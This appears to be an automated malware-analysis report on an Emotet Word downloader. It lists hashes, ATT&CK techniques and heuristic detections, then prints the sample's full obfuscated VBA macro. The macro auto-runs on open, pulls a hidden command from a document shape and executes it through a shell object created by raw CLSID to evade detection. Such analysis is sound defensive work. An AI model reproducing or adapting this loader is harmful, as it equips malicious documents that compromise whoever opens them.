Emotet — Office (OLE) malware analysis

Static analysis result for SHA-256 4d75f0744d8754f7…

MALICIOUS

Office (OLE)

Size: 82.4 KB
Created: 2018-11-27 10:04:00
Authoring application: Microsoft Office Word
First seen: 2019-05-10
MD5: 8db608522f75499b3538be7b3711d0b4
SHA-1: 964c29e0cf70cbd275945c25e4f2b687c076c5d0
SHA-256: 4d75f0744d8754f79e2dcfd1423b567ced8d5a6d201fc73a1a2f0e7b806cb134
Risk Score: 252

Malware Insights

Emotet · confidence 95%

MITRE ATT&CK
T1059.003 Windows Command Shell
T1059.005 Visual Basic
T1204.002 Malicious File

The sample contains VBA macros that attempt to execute a command-line payload using WScript.Shell. The obfuscated command line indicates an attempt to download and execute a second-stage payload from a remote source. The ClamAV detection and heuristic firings strongly suggest this is an Emotet downloader.

Heuristics 9

  • ClamAV: Doc.Downloader.Emotet-6826428-0 critical CLAMAV_DETECTION
    ClamAV detected this file as malware: Doc.Downloader.Emotet-6826428-0
  • VBA macros detected medium 3 related findings OLE_VBA_MACROS
    Document contains VBA macro code
  • VBA instantiates a dangerous COM class by CLSID critical OLE_VBA_GETOBJECT_CLSID_DANGEROUS
    VBA uses GetObject("new:{CLSID}") to instantiate an execution/scripting-capable COM class by its raw CLSID, avoiding the CreateObject ProgID that name-based detection keys on.
    Matched line in script
    End Select
    Set CKLZrpfQH = GetObject("new:72C24DD5-D70A-438B-8A42-98424B88AFB8" + UfEKISu)
       On Error Resume Next
  • GetObject call high OLE_VBA_GETOBJ
    GetObject call
    Matched line in script
    End Select
    Set CKLZrpfQH = GetObject("new:72C24DD5-D70A-438B-8A42-98424B88AFB8" + UfEKISu)
       On Error Resume Next
  • AutoOpen macro low OLE_VBA_AUTOOPEN
    AutoOpen macro
    Matched line in script
    Attribute VB_Customizable = True
    Sub AutoOpen()
       On Error Resume Next
  • Suspicious cmd.exe invocation with execution flag high SC_STR_CMD
    Suspicious cmd.exe invocation with execution flag
  • Legacy WordBasic auto-exec macro marker medium OLE_LEGACY_WORDBASIC_AUTOEXEC
    OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
  • Suspicious extracted artifact info EXTRACTED_FILE_STATIC_TRIAGE
    One or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.
  • Embedded URL info EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URL http://schemas.openxmlformats.org/drawingml/2006/main In document text (OLE body)

Extracted artifacts 1

Files carved from inside the sample during analysis.

Filename: macros.bas
Kind: vba-macro
Source: oletools.olevba.extract_macros (decoded VBA source)
Size: 7101 bytes
SHA-256: 6d0928e18f206fbcf2557097bb69536455f47f03a65964514d34361a2b4d9ba9
Detection
ClamAV: No threats found
Obfuscation or payload: likely
81 of 140 identifiers look randomly generated (e.g. 'QkzddrZwF') — consistent with name-mangling obfuscation.
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "LFvMOUDH"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Sub AutoOpen()
   On Error Resume Next
 For Each GNqOahcJj In QnSAShnN
         VUEtj = 324186903 + Oct(267790199) - 35962565 - CBool(301893 / 19523015) * 248041449 + Log(RWajfaNf - CLng(182456325)) - 12662481 + Hex(rOozwzm)
      Next
      Select Case CoThbCUK
         Case 111333709
            bcGvCwRr = Cos(134405757)
            GZhjTsMi = 293750196
         Case 1430403
            GNViszowd = Sqr(77006094 / CSng(107780915 - Cos(320175595 - 301140370) + ZUwMp + Rnd(206111826 - 47077578)))
            zacGnNj = Hex(pRQvVOlMJ)
End Select
   On Error Resume Next
 For Each vXTHwPDo In JaaNokm
         riwJSjo = 12555619 + Oct(267648719) - 170155140 - CBool(211835533 / 292010420) * 270725767 + Log(QOUAiZRXX - CLng(262685727)) - 68929297 + Hex(UwiHsbFN)
      Next
      Select Case uPbcriF
         Case 62724399
            WwoOJLsnG = Cos(82022272)
            TKJzjL = 290973433
         Case 156704314
            hEmbZWzt = Sqr(158633812 / CSng(252453285 - Cos(311504814 - 77665428) + hQOwGm + Rnd(119207337 - 96839430)))
            VtCCj = Hex(cwjmh)
End Select
   On Error Resume Next
 For Each LRjFpwFB In QfNzc
         wsZnZHiCt = 313276589 + Oct(31268410) - 112388666 - CBool(52658254 / 255692241) * 206472109 + Log(UuMNdT - CLng(3874280)) - 121579296 + Hex(SRNpi)
      Next
      Select Case lYwnnbR
         Case 208843991
            cPqKkhz = Cos(95028179)
            CLTmOUi = 289421116
         Case 48464696
            HqUMKVTs = Sqr(75251326 / CSng(339518029 - Cos(290901400 - 253639720) + OklOd + Rnd(278867350 - 220706598)))
            UDqnXGw = Hex(cJvUj)
End Select
   On Error Resume Next
 For Each QkzddrZwF In YiznO
         AuDzJ = 230640565 + Oct(27007682) - 332786226 - CBool(128204748 / 8269376) * 170551415 + Log(aCNiDX - CLng(38054539)) - 39295480 + Hex(ziFcTajPc)
      Next
      Select Case ampfaFt
         Case 243486468
            jBJcSLWD = Cos(267269743)
            iahIHAMzX = 275219642
         Case 53818524
            iqazakX = Sqr(256784057 / CSng(192752098 - Cos(63254733 - 251825007) + ZwpGnRz + Rnd(156090911 - 289622425)))
            zAtiiiO = Hex(WvZJS)
End Select
Set sqbqdoj = Shapes("GajSAfqNUN")
   On Error Resume Next
 For Each CiofPPSUm In JGUDHDNAk
         kjKrifwB = 243992962 + Oct(245555526) - 126559194 - CBool(292664415 / 15402262) * 183984654 + Log(lWvGw - CLng(193703658)) - 293188912 + Hex(LhzCn)
      Next
      Select Case ZpEHNFSYz
         Case 5545639
            TRjBWRDs = Cos(335245964)
            hStmGsc = 334795808
         Case 61929764
            cIGLvOl = Sqr(271105995 / CSng(148033157 - Cos(252211903 - 85597194) + uWiMJGo + Rnd(109670263 - 316071143)))
            oYsXKU = Hex(NqZnW)
End Select
NbihT = "" + WKsiSTi + XFHjO + IHXXH + DQiJwn + sqbqdoj.TextFrame.TextRange.Text + OUBlAj + ocPkznN + UPvopqc
   On Error Resume Next
 For Each wmmnLzJV In oMJho
         fQiKTQCAn = 341327456 + Oct(8727488) - 210290617 - CBool(163267626 / 129061935) * 163843413 + Log(dEzdlDwO - CLng(197884473)) - 107861224 + Hex(KoIsvX)
      Next
      Select Case jjwPzPvmz
         Case 260083087
            TkCjD = Cos(232203053)
            hKMbU = 136995925
         Case 212881204
            FsMfH = Sqr(41335030 / CSng(55293398 - Cos(185726603 - 237289855) + oOEjizDI + Rnd(24149154 - 71608706)))
            IakYnNNk = Hex(PbiwJ)
End Select
Set CKLZrpfQH = GetObject("new:72C24DD5-D70A-438B-8A42-98424B88AFB8" + UfEKISu)
   On Error Resume Next
 For Each pTCqrX In noiRVzGmG
         hiKUs = 151849952 + Oct(15692355) - 116185978 - CBool(233991464 / 95501929) * 302867079 + Log(VRokHAM - CLng(124334041)) - 90093407 + Hex(rnjvUssZF)
      Next
      Select Case sLdjEwzwA
         Case 160441572
            IDNSR = Cos(189508338)
            rGZnolmX = 242519610
         Case 321484578
            JZJIv = Sqr(222087830 / CSng(68193071 - Cos(263987552 - 52286744) + LDPSpnjk + Rnd(144653736 - 191075549)))
            QHizY = Hex(WruhL)
End Select
Const zYXRLdMGf = 0
   On Error Resume Next
 For Each jvzjWqmDU In HGfApsJI
         LYzYwP = 165597555 + Oct(86376666) - 52254248 - CBool(284224542 / 114594614) * 14719510 + Log(DEVZiJS - CLng(296350119)) - 275387566 + Hex(AtnvWvYs)
      Next
      Select Case lXjXhW
         Case 336350581
            zdiMCi = Cos(246818269)
            biPNz = 273116834
         Case 177178822
            mwfKUCR = Sqr(232687051 / CSng(330933894 - Cos(26202110 - 108348466) + TjnDfsUPL + Rnd(172752940 - 327989873)))
            CruQIf = Hex(wwNljr)
End Select
   On Error Resume Next
 For Each lEZibjU In LUvItldA
         AqLuGszB = 97801362 + Oct(294320289) - 132735290 - CBool(56373126 / 175826934) * 200941649 + Log(isQBVV - CLng(237657695)) - 68525647 + Hex(mswQqHi)
      Next
      Select Case zmvIwhi
         Case 76693316
            hMoAikp = Cos(179947327)
            BUbiRQf = 233973021
         Case 50058928
            vjLHOp = Sqr(61363776 / CSng(262723382 - Cos(232460995 - 79161552) + LlqvoXWb + Rnd(56457889 - 50992434)))
            pQFJC = Hex(VicMZQ)
End Select
CKLZrpfQH.Run! NbihT, zYXRLdMGf
   On Error Resume Next
 For Each nNTFFJUOv In AfzCl
         BUkqI = 210955253 + Oct(32331301) - 28177547 - CBool(253145123 / 139736334) * 198952242 + Log(fwPZOWbnL - CLng(262133406)) - 251281561 + Hex(icjkibbY)
      Next
      Select Case vIzMzo
         Case 51291228
            OSkfa = Cos(230715118)
            tbQaazsNi = 337726676
         Case 73707196
            zUZLuGaj = Sqr(264484148 / CSng(118606091 - Cos(85941343 - 115795379) + TiwUBFEt + Rnd(225117020 - 280668151)))
            KAzVC = Hex(PNmIIooHq)
End Select
   On Error Resume Next
 For Each skTEaJbw In CVXjiBf
         EMLiKb = 83180924 + Oct(288302224) - 75934773 - CBool(315011749 / 260037369) * 130989071 + Log(mdVEZT - CLng(109486038)) - 146151880 + Hex(MwHrPb)
      Next
      Select Case HjzuRKOFF
         Case 223141062
            GMPNn = Cos(191392768)
            QrCbE = 220335717
         Case 99063698
            tAMXTLkzE = Sqr(101687224 / CSng(262677007 - Cos(168655391 - 340282365) + PQwsKKJ + Rnd(316363973 - 335269185)))
            ihzkqf = Hex(SfbRNsi)
End Select
   On Error Resume Next
 For Each clUEmKiJ In caNNiLPj
         AqRPBs = 27646222 + Oct(146528149) - 159393842 - CBool(177382718 / 131262164) * 196071723 + Log(phaBaTswq - CLng(215699555)) - 118474896 + Hex(ihrpjjKK)
      Next
      Select Case LzXMk
         Case 186684048
            QmDpI = Cos(243030207)
            fmhkwrNK = 67042207
         Case 341241116
            SLMhrrJ = Sqr(123983316 / CSng(241574423 - Cos(193895227 - 224655750) + oqrsi + Rnd(26784235 - 194234344)))
            czvLCwz = Hex(TtBpXh)
End Select
End Sub